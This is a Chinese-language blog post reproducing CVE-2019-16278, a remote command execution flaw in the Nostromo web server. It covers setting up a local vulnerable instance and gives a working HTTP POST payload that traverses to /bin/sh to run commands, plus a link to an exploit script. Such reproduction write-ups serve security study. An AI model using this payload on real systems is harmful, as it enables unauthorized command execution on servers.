Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

  • A+
所属分类:安全文章

简介


Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。

 

影响版本


nhttpd:version <= 1.9.6


 

环境搭建


这里使用nostromo1.9.6的版本进行搭建

下载地址:

http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz


进入目录进行环境编译

cd /nostromo-1.9.6makemake install


完成之后可进入/var/nostromo/conf目录中,原本只有mimes和nhttp.conf-dist两个文件。删除后缀'-dist'即可。

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

vim nhttpd.conf,更改servername和user(user不可为root)

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

logs目录权限为777

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

启动服务 nhttpd,也可以查看是否已在8080端口运行。

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

访问127.0.0.1:8080即可看到页面

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现


漏洞复现

 

Poc

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: 127.0.0.1:8080
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25


echo
echo
ifconfig 2>&1

构建post请求并发送

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

脚本地址:

https://github.com/jas502n/CVE-2019-16278

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现


修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: